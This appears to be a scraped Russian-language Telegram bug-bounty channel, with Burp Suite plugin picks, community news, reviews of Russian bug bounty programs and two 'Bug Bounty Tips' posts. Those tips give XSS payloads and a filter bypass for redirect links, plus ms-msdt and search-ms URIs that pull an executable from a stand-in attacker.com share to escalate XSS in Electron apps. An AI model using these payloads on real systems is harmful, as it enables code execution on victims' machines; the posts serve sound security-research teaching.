Всем привет!
Сегодня день благодарности разработчикам плагинов, а значит надо их поблагодарить и поделиться ими с другими.
Этим постом я хотел пошерить плагины для Burp Suite, которые могут помочь для багхантинга или пентестов.
1 - Scope Monitor.
Плагин, на который я наткнулся на днях, когда искал удобный инструмент для сохранения всех запросов во время пентеста. Оно позволяет легко отслеживать все URL из скоупа. Автоматически добавляет каждую конечную точку из Target Scope в лист, где вы можете отметить его проверенным или наоборот. Также есть экспорт в CSV, если вдруг будет необходимо передать кому список проверенных запросов.
2 - Auth Analyzer.
Неплохое расширение для бюрпа, помогающее в поиске багов, связанных с авторизацией. Автоматически подтягивает данные сессий или csrf токены. Плагин помогает искать уязвимости, связанные с правами пользователя.
3 - Logger++.
Расширение, которое поможет работать с отправленными запросами эффективнее. Позволяет фильтровать запросы по заданному выражению, отображает тулзы, отправившие запросы и многое другое. Есть экспорт истории в csv.
4 - Burp Bounty.
Плагин, который помогает в поиске уязвимостей путём добавления собственных профилей в Active и Passive сканеры бюрпа. Существует платная и бесплатная версии.
5 - Turbo Intruder.
Расширение для бюрпа, которое является "улучшенной" версией стокового Intruder`а. Имеет гибкие настройки и шаблоны, которые позволяют отправлять запросы куда эффективнее, по сравнению с оригинальным решением.
Надеюсь, что вы открыли для себя что-то новенькое ❤️
@zema_notes
Сегодня день благодарности разработчикам плагинов, а значит надо их поблагодарить и поделиться ими с другими.
Этим постом я хотел пошерить плагины для Burp Suite, которые могут помочь для багхантинга или пентестов.
1 - Scope Monitor.
Плагин, на который я наткнулся на днях, когда искал удобный инструмент для сохранения всех запросов во время пентеста. Оно позволяет легко отслеживать все URL из скоупа. Автоматически добавляет каждую конечную точку из Target Scope в лист, где вы можете отметить его проверенным или наоборот. Также есть экспорт в CSV, если вдруг будет необходимо передать кому список проверенных запросов.
2 - Auth Analyzer.
Неплохое расширение для бюрпа, помогающее в поиске багов, связанных с авторизацией. Автоматически подтягивает данные сессий или csrf токены. Плагин помогает искать уязвимости, связанные с правами пользователя.
3 - Logger++.
Расширение, которое поможет работать с отправленными запросами эффективнее. Позволяет фильтровать запросы по заданному выражению, отображает тулзы, отправившие запросы и многое другое. Есть экспорт истории в csv.
4 - Burp Bounty.
Плагин, который помогает в поиске уязвимостей путём добавления собственных профилей в Active и Passive сканеры бюрпа. Существует платная и бесплатная версии.
5 - Turbo Intruder.
Расширение для бюрпа, которое является "улучшенной" версией стокового Intruder`а. Имеет гибкие настройки и шаблоны, которые позволяют отправлять запросы куда эффективнее, по сравнению с оригинальным решением.
Надеюсь, что вы открыли для себя что-то новенькое ❤️
@zema_notes
👍13❤5💩2🔥1
XSS Hunter закрылся. Или нет?
Конечно, существует множество аналогов, но не факт, что они не воруют ваши уязвимости и данные. Но, оказывается, trufflesecurity договорились с владельцем xsshunter и теперь можно дальше пихать готовые пейлоады, не заморачиваясь с поднятием инфраструктуры и сохранности своих данных. Лично я доверяю ребятам из трюфельбезопасность и считаю, что их продукта можно не бояться.
Также, они добавили новый функционал, а именно:
Анализ CORS;
Обнаружение секретных ключей на страницах, на которых сработал пейлоад;
Обнаружение открытой .git директории;
Фичи для приватности, которые повысят защиту от случайных утечек;
Вход через Google SSO для избежания использования паролей.
Ознакомится полностью можно тут:
https://trufflesecurity.com/blog/xsshunter/
Credits to: Поросёнок Пётр (именно у него я увидел новость об этом)
Записки Земы
Конечно, существует множество аналогов, но не факт, что они не воруют ваши уязвимости и данные. Но, оказывается, trufflesecurity договорились с владельцем xsshunter и теперь можно дальше пихать готовые пейлоады, не заморачиваясь с поднятием инфраструктуры и сохранности своих данных. Лично я доверяю ребятам из трюфельбезопасность и считаю, что их продукта можно не бояться.
Также, они добавили новый функционал, а именно:
Анализ CORS;
Обнаружение секретных ключей на страницах, на которых сработал пейлоад;
Обнаружение открытой .git директории;
Фичи для приватности, которые повысят защиту от случайных утечек;
Вход через Google SSO для избежания использования паролей.
Ознакомится полностью можно тут:
https://trufflesecurity.com/blog/xsshunter/
Credits to: Поросёнок Пётр (именно у него я увидел новость об этом)
Записки Земы
🔥5💩4❤2👍1
Всем привет! Спасибо за подписки. Уже больше >200 подписчиков! (Для меня это очень неожиданно, спасибо, @zaheck)
А теперь про сегодняшний пост:
В нынешнее время почти каждый сайт имеет различные виды дополнительного подтверждения через одноразовые коды. Сегодня я хотел бы рассказать про баги, связанные с OTP. Возможно кому-то это всё известно, но начиающим свой путь в тестировании web-приложений может оказаться полезным! Приятного прочтения!
https://telegra.ph/Pogovorim-pro-kody-podtverzhdeniya-03-28
Записки Зёмы
А теперь про сегодняшний пост:
В нынешнее время почти каждый сайт имеет различные виды дополнительного подтверждения через одноразовые коды. Сегодня я хотел бы рассказать про баги, связанные с OTP. Возможно кому-то это всё известно, но начиающим свой путь в тестировании web-приложений может оказаться полезным! Приятного прочтения!
https://telegra.ph/Pogovorim-pro-kody-podtverzhdeniya-03-28
Записки Зёмы
Telegraph
Поговорим про коды подтверждения
Всем привет! Сегодняшней статьёй я хотел бы обсудить баги в немало важной штуке как 2FA. Немного теории 2FA (Two-Factor Authentication) - это метод аутентификации, который требует от пользователя предоставления двух форм идентификации для проверки подлинности…
❤8🔥3🤔1🤡1
Давно тут не появлялся.
Разбавлю пустоту небольшими Tips для Bug Bounty.
Часть будет многим известна, часть, но возможно, для кого-то станет чем-то новеньким. Всё же мой канал не только для профессионалов в сфере ИБ.
Что же, BB Tips #1.
XSS в Redirect.
Представим ситуацию - вы нашли кнопку редиректа, значение которой подставляется со стороны пользователя. Open Redirect принимается мало где, именно поэтому нужно попытаться докрутить до XSS, чтобы был импакт. Как это сделать рассмотрим ниже.
Вариант 1 (самый топорный, но часто срабатывает).
Payload -
Решение - кликать средней кнопкой мыши по ссылке.
Hint: ещё это срабатывает с Markdown.
Payload -
Вариант 2.
Если разработчики фильтруют строку, чтобы она не начиналась с javanoscript:, при помощи регулярного выражения следующего вида
Разбавлю пустоту небольшими Tips для Bug Bounty.
Часть будет многим известна, часть, но возможно, для кого-то станет чем-то новеньким. Всё же мой канал не только для профессионалов в сфере ИБ.
Что же, BB Tips #1.
XSS в Redirect.
Представим ситуацию - вы нашли кнопку редиректа, значение которой подставляется со стороны пользователя. Open Redirect принимается мало где, именно поэтому нужно попытаться докрутить до XSS, чтобы был импакт. Как это сделать рассмотрим ниже.
Вариант 1 (самый топорный, но часто срабатывает).
Payload -
javanoscript:alert(document.domain)Вставляем, кликаем и... Ничего не происходит. Нас просто отправляет на страницу about#blocked (или about#blank).
Решение - кликать средней кнопкой мыши по ссылке.
Hint: ещё это срабатывает с Markdown.
Payload -
[a](javanoscript:alert(document.domain))
Вариант 2.
Если разработчики фильтруют строку, чтобы она не начиналась с javanoscript:, при помощи регулярного выражения следующего вида
^(?!javanoscript:).+можно подставить пробел в начало нашей нагрузки. Если ссылка подставляется из параметров, поставьте %20, чтобы пейлоад приобрёл следующий вид:
%20javanoscript:alert()Вставляем, кликаем СКМ, наслаждаемся XSS.
🔥17👍4👏2
Bug Bounty Tips #2
Сегодня затронем приложения на Electron. А конкретнее доведение XSS до RCE (ну или почти).
Что может понадобиться для упрощения работы:
Сканер electronegativity. Он нужен для сканирования Electron приложений на различные мисконфигурации;
Сканер nodejsscan. Этот инструмент умеет в сканирование модулей nodejs, которые наверняка встроены в исследуемый продукт.
Первым делом нужно найти XSS в исследуемом сервисе. Довольно часто её причиной становится Markdown (на своей практике встречал уже несколько раз). Найти больше информации по XSS в Markdown можно тут.
Если XSS на нашем сайте не была найдена, нужно идти в код приложение и смотреть как приложения открывает ссылки.
Кейс 1 -
Внешние ссылки открываются во внешнем браузере.
Решение - Искать мисконфигурации открытия. Например, проверки на то, что ссылка содержит https://example.com/, а не начинается на это. Ещё можно попытаться кликнуть средней кнопкой мыши.
Кейс 2 -
Внешние ссылки открываются в самом приложении.
Если встретили такое поведение - вам упростили работу.
Итак. Мы смогли найти XSS/возможность открыть внешние ссылки. Что дальше? - встраивать полезные нагрузки. Если electron приложение имеет мисконфигурацию в области работы с nodejs - вы сможете выполнить код. Если нет - смотрите на версию Electron. Вполне возможно, что попадётся версия, уязвимая к различным обходам nodeIntegration.
Если выполнить код не удалось, то можно попытаться выполнить удалённый код/повысить импакт XSS при помощи различных URI схем.
Примеры того, что можно использовать:
На этих строчках подхожу к концу и желаю всем удачи в поисках уязвимостей.
@zema_notes
p.s. перечитал пост и понял. что кому-то может он показаться непонятным, поэтому если есть вопросы - пишите в комменты, постараюсь ответить.
Сегодня затронем приложения на Electron. А конкретнее доведение XSS до RCE (ну или почти).
Что может понадобиться для упрощения работы:
Сканер electronegativity. Он нужен для сканирования Electron приложений на различные мисконфигурации;
Сканер nodejsscan. Этот инструмент умеет в сканирование модулей nodejs, которые наверняка встроены в исследуемый продукт.
Первым делом нужно найти XSS в исследуемом сервисе. Довольно часто её причиной становится Markdown (на своей практике встречал уже несколько раз). Найти больше информации по XSS в Markdown можно тут.
Если XSS на нашем сайте не была найдена, нужно идти в код приложение и смотреть как приложения открывает ссылки.
Кейс 1 -
Внешние ссылки открываются во внешнем браузере.
Решение - Искать мисконфигурации открытия. Например, проверки на то, что ссылка содержит https://example.com/, а не начинается на это. Ещё можно попытаться кликнуть средней кнопкой мыши.
Кейс 2 -
Внешние ссылки открываются в самом приложении.
Если встретили такое поведение - вам упростили работу.
Итак. Мы смогли найти XSS/возможность открыть внешние ссылки. Что дальше? - встраивать полезные нагрузки. Если electron приложение имеет мисконфигурацию в области работы с nodejs - вы сможете выполнить код. Если нет - смотрите на версию Electron. Вполне возможно, что попадётся версия, уязвимая к различным обходам nodeIntegration.
Если выполнить код не удалось, то можно попытаться выполнить удалённый код/повысить импакт XSS при помощи различных URI схем.
Примеры того, что можно использовать:
ms-msdt:-id PCWDiagnostic /moreoptions false /skip true /param IT_BrowseForFile="\\attacker.com\smb_share\malicious_executable.exe" /param IT_SelectProgram="NotListed" /param IT_AutoTroubleshoot="ts_AUTOЭти "ссылки" необходимо открыть каким-либо образом. В случае с markdown их можно встроить в ссылки [Some Text](Payload), а затем открыть при помощи СКМ. Если вы нашли XSS/смогли открыть произвольную страницу - откройте при помощи window.open(Payload)
search-ms:query=malicious_executable.exe&crumb=location:%5C%5Cattacker.com%5Csmb_share%5Ctools&displayname=Important%20update
На этих строчках подхожу к концу и желаю всем удачи в поисках уязвимостей.
@zema_notes
p.s. перечитал пост и понял. что кому-то может он показаться непонятным, поэтому если есть вопросы - пишите в комменты, постараюсь ответить.
🔥14👍3❤1🤡1
Недавно у Багхантер (кто не подписан, объяснитесь, как так вышло?) проходил конкурс, в котором нужно было написать про свою самую лучшую находку.
Я принял участие и занял почётное 3 место.
Получил носочки, значки, промо на +3к к репорту у ВК и стикеры.
Спасибо огромное Юре за конкурс, а также вендорам за предоставленные призы <3
Статья про уязвимость будет уже скоро на канале.
Я принял участие и занял почётное 3 место.
Получил носочки, значки, промо на +3к к репорту у ВК и стикеры.
Спасибо огромное Юре за конкурс, а также вендорам за предоставленные призы <3
Статья про уязвимость будет уже скоро на канале.
🔥11🤯3🤡2
Forwarded from Багхантер
30 октября 1961 года серьезные люди собрались на Новой Земле с одной целью - взорвать термоядерную авиационную бомбу "Кузькину мать" или по-другому "Царь-бомбу" (путем сброса её с самолета) на ядерном полигоне «Сухой Нос». Итоговая мощность взрыва составила примерно 58,6 мегатонн в тротилловом эквиваленте, что соответствует дефекту масс примерно 2.65 кг. В радиусе 35 километров от точки взрыва все здания были полностью уничтожены, ударная волна 3 раза обогнула Землю, а сама ядерная вспышка была видна на расстоянии более 1000 км.
14 октября 2023 года в 18:00 серьезные люди (сотни а может быть даже тысячи багхантеров и 10 докладчиков) соберутся онлайн на трансляции в канале "Багхантер" с одной целью - послушать доклады экспертов мирового уровня, известных багхантеров, специалистов по информационной безопасности с большим опытом. "Мы вам еще покажем кузькину мать!"
Примерное расписание:
завтра, в
18:10 - 18:30 - «Техобслуживание и ремонт системы питания дизельного двигателя»
18:30 - 18:50 - «Вкатываемся в Web3 на примере TON»
18:50 - 19:10 - «Вкатываемся в Web3»
19:10 - 19:30 - «Как сломать банкомат... через интернет!»
19:30 - 20:10 - «Логические баги из реальной жизни»
20:10 - 20:30 - «Generate werkzeug pins»
20:30 - 20:50 - «развитие ББ ВК»
20:50 - 21:10 - «нашёл SELF XSS не сдавайся»
21:10 - 21:30 - «Zerocode security v0.7 - Mobile builders»
21:30 - 21:50 - «Наступательные инструменты разработчика»
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5
Всем привет и с наступившим новым годом! Всем желаю покорить новые вершины и достигнуть тех целей, что поставили на этот год.
У меня уже пару месяцев лежала статья, ожидающая публикации. И вот, спустя пару месяцев отсутствия, пришло время опубликовать её, рассказать о найденом интересном баге, о новой для многих программе, а также показать то, чем бывает полезно попросить помощи, даже с довольно банальными вещами.
Приятного чтения!
https://telegra.ph/Path-Traversal--RCE-v-Windows-prilozhenii-Pyrus-Sync-09-15
По поводу взаимодействия с программой -выплата заняла больше полугода (если бы получал на PayPal, времени ушло куда меньше), сумма выплаты довольно маленькая, учитывая распространение и клиентов, которые используют это решение. Программа создана чисто для набора опыта. Тем, кто идёт туда за деньгами, делать там особо нечего.
Записки Зёмы
У меня уже пару месяцев лежала статья, ожидающая публикации. И вот, спустя пару месяцев отсутствия, пришло время опубликовать её, рассказать о найденом интересном баге, о новой для многих программе, а также показать то, чем бывает полезно попросить помощи, даже с довольно банальными вещами.
Приятного чтения!
https://telegra.ph/Path-Traversal--RCE-v-Windows-prilozhenii-Pyrus-Sync-09-15
По поводу взаимодействия с программой -
Записки Зёмы
Telegraph
Path Traversal => RCE в Windows приложении Pyrus Sync
Всем привет, ку, здарова! В этой статье я хотел бы поделиться одной из своих недавних довольно критичных уязвимостей. Вступление Уязвимость была найдена у Pyrus. Это платформа управления процессами компаний. Используется разными крупными компаниями в РФ и…
🔥15❤4
Forwarded from Заметки Слонсера (Slonser)
История одной уязвимости в Chrome
Очень простая уязвимость, которую я нашел в Google Chrome. И за которую получил 16000$.
Попытался дать побольше контекста, чтобы увеличить пользу от прочтения материала.
Habr
Twitter
P.S. Лучшей благодарностью, если вам понравился материал - является его распространение.
Очень простая уязвимость, которую я нашел в Google Chrome. И за которую получил 16000$.
Попытался дать побольше контекста, чтобы увеличить пользу от прочтения материала.
Habr
P.S. Лучшей благодарностью, если вам понравился материал - является его распространение.
Хабр
History of one Google Chrome bug
Статья имеет ознакомительный характер и предназначена для специалистов по безопасности, проводящих тестирование в рамках контракта. Автор не несет ответственности за любой вред,...
❤10🔥5👍1
Привет, это Зёма. Я вернулся. Снова.
Прошло уже больше 2 лет с великогопидо прогона граждан РФ с зарубежных площадок. В октябре 2022 года я делал пост, который касался багхантинга в новом мире. Пришло время актуализировать информацию. К сожалению (или к счастью для меня), в этот раз не будет разделения на возраст, необходимый для участия.
Начнём с площадок:
- Standoff365 - сделали крупные шаги и сделали багхантинг доступным всем! Добавили фильтры, которые позволяют отобрать программы разным группам хакерам (несовершеннолетним или гражданам не РФ);
- Bi.Zone - прикольные рейтинги, а также у них есть программы, которых нет на других платформах (например, Astra Linux);
- Bugbounty.ru - ну это ббру, ничего особо не изменилось, только добавились программы.
В это году VK в честь десятилетия программы баг баунти сделали Bug Bounty Pass. Советую принять участие.
Hackenproof ограничили доступ для РФ. Что по итогу с ними - неизвестно. Да и участие в бб у них на площадке может нести риски для граждан РФ. Не советую.
А теперь про Self-hosted программы. За это время я попробовал множество программ и хотел бы поделиться некоторыми из них, а также фидбеком.
- CardPR - отвечают быстро, платят щедро. Довольно интересные правила программы бб, но у них есть свои плюсы;
- Пешкарики - долго отвечают, выплаты относительно неплохие, есть что поискать. Было такое, что выплату разбили на 2 части, даже не предупредив об этом;
- AvanChange - платят нормально, ответы довольно быстрые, есть что покапать. Особенно подойдёт тем, кто любит поковыряться с различными криптовалютными обменниками;
- in.top - выплаты небольшие, но есть чего покапать, отвечают быстро;
- Aeza - самая противоречивая программа. Кажется платят мало, приходилось доказывать, что для эксплуатации XSS не нужно убеждать пользователя разрешить выполнение JS (если это не отключено по умолчанию);
- FunPay - с них, можно сказать, начался мой путь в бб. Приятные выплаты, накидывают соточку даже за опечатки. Ответы относительно быстрые, с Михаилом довольно приятно общаться, крутой мужик!;
- Пачка - одна из самых приятных программ. Выплаты средние, но всегда готовы обсудить баги. 1 раз выплатили за багу, про которую им было известно, но я нашёл как её можно крутануть дальше;
- Pyrus - есть что поискать. Пост про найденную у них багу уже был на канале в начале этого года. Выплату получал полгода (частично моя вина, т.к. отложил до своего совершеннолетия, но и после этого потребовалось 2 месяца, чтобы денежка до меня дошла).
Ещё есть Яндекс, они часто проводят конкурсы с большими иксами, но как-то не участвовал.
Также остаются прежние рекомендации:
- Стоит самостоятельно искать бб программы при помощи дорок поисковых систем. Почти все сайты из списка выше были найдены таким образом;
- Перед тем, как убить всё свободное время, стоит закинуть пару простых багов, чтобы оценить стоит ли программа того;
- Не всегда те, кто готовы платить за уязвимости, публично заявляют об этом;
- И, наконец, try harder!
Небольшое уточнение. Выплаты оценивал чисто для себя (обычного студента, ведущего размеренный образ жизни).
Критику и дополнения как всегда готов принять в комментариях. Возможно это повлияет на следующий пост, который когда-нибудь выйдет.
Записки Зёмы
Прошло уже больше 2 лет с великого
Начнём с площадок:
- Standoff365 - сделали крупные шаги и сделали багхантинг доступным всем! Добавили фильтры, которые позволяют отобрать программы разным группам хакерам (несовершеннолетним или гражданам не РФ);
- Bi.Zone - прикольные рейтинги, а также у них есть программы, которых нет на других платформах (например, Astra Linux);
- Bugbounty.ru - ну это ббру, ничего особо не изменилось, только добавились программы.
В это году VK в честь десятилетия программы баг баунти сделали Bug Bounty Pass. Советую принять участие.
Hackenproof ограничили доступ для РФ. Что по итогу с ними - неизвестно. Да и участие в бб у них на площадке может нести риски для граждан РФ. Не советую.
А теперь про Self-hosted программы. За это время я попробовал множество программ и хотел бы поделиться некоторыми из них, а также фидбеком.
- CardPR - отвечают быстро, платят щедро. Довольно интересные правила программы бб, но у них есть свои плюсы;
- Пешкарики - долго отвечают, выплаты относительно неплохие, есть что поискать. Было такое, что выплату разбили на 2 части, даже не предупредив об этом;
- AvanChange - платят нормально, ответы довольно быстрые, есть что покапать. Особенно подойдёт тем, кто любит поковыряться с различными криптовалютными обменниками;
- in.top - выплаты небольшие, но есть чего покапать, отвечают быстро;
- Aeza - самая противоречивая программа. Кажется платят мало, приходилось доказывать, что для эксплуатации XSS не нужно убеждать пользователя разрешить выполнение JS (если это не отключено по умолчанию);
- FunPay - с них, можно сказать, начался мой путь в бб. Приятные выплаты, накидывают соточку даже за опечатки. Ответы относительно быстрые, с Михаилом довольно приятно общаться, крутой мужик!;
- Пачка - одна из самых приятных программ. Выплаты средние, но всегда готовы обсудить баги. 1 раз выплатили за багу, про которую им было известно, но я нашёл как её можно крутануть дальше;
- Pyrus - есть что поискать. Пост про найденную у них багу уже был на канале в начале этого года. Выплату получал полгода (частично моя вина, т.к. отложил до своего совершеннолетия, но и после этого потребовалось 2 месяца, чтобы денежка до меня дошла).
Ещё есть Яндекс, они часто проводят конкурсы с большими иксами, но как-то не участвовал.
Также остаются прежние рекомендации:
- Стоит самостоятельно искать бб программы при помощи дорок поисковых систем. Почти все сайты из списка выше были найдены таким образом;
- Перед тем, как убить всё свободное время, стоит закинуть пару простых багов, чтобы оценить стоит ли программа того;
- Не всегда те, кто готовы платить за уязвимости, публично заявляют об этом;
- И, наконец, try harder!
Небольшое уточнение. Выплаты оценивал чисто для себя (обычного студента, ведущего размеренный образ жизни).
Критику и дополнения как всегда готов принять в комментариях. Возможно это повлияет на следующий пост, который когда-нибудь выйдет.
Записки Зёмы
Telegram
Записки Зёмы
Что ломать?
Именно этот вопрос у меня появился после кражи денег запрета вывода гражданам РФ со стороны HackerOne и некоторых других площадок.
Уже прошло пол года с того момента, и я готов поделиться тем, к чему пришёл за это время.
Для дееспособных совершеннолетних…
Именно этот вопрос у меня появился после кражи денег запрета вывода гражданам РФ со стороны HackerOne и некоторых других площадок.
Уже прошло пол года с того момента, и я готов поделиться тем, к чему пришёл за это время.
Для дееспособных совершеннолетних…
❤18🔥6👍5✍2👏2
Forwarded from Just Security
This media is not supported in your browser
VIEW IN TELEGRAM
Ежегодная независимая премия для пентестеров — Pentest award возвращается!
Раз в году у этичных хакеров появляется шанс громко заявить о своих достижениях, показать свой вклад в развитие российского рынка ИБ и обменяться лучшими историями из практики на церемонии награждения Pentest award.
В этот раз вас ждут 6 номинаций, по три призовых места в каждой:
— Пробив WEB🆕
— Пробив инфраструктуры🆕
— Девайс🆕
— Hack the logic
— Раз bypass, два bypass
— Ловись рыбка
Главный приз — тяжеленная стеклянная именная статуэтка за первое место. Не менее главные призы: макбуки, айфоны, смарт-часы, умные колонки, а также бесценные подарки от партнеров проекта BI.ZONE Bug Bounty и VK Bug Bounty.
Сбор заявок уже открыт на сайте — https://award.awillix.ru/
Давайте покажем, на что способны этичные хакеры!
#pentestaward
Раз в году у этичных хакеров появляется шанс громко заявить о своих достижениях, показать свой вклад в развитие российского рынка ИБ и обменяться лучшими историями из практики на церемонии награждения Pentest award.
В этот раз вас ждут 6 номинаций, по три призовых места в каждой:
— Пробив WEB
— Пробив инфраструктуры
— Девайс
— Hack the logic
— Раз bypass, два bypass
— Ловись рыбка
Главный приз — тяжеленная стеклянная именная статуэтка за первое место. Не менее главные призы: макбуки, айфоны, смарт-часы, умные колонки, а также бесценные подарки от партнеров проекта BI.ZONE Bug Bounty и VK Bug Bounty.
Сбор заявок уже открыт на сайте — https://award.awillix.ru/
Давайте покажем, на что способны этичные хакеры!
#pentestaward
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🔥4🤮3❤2👎2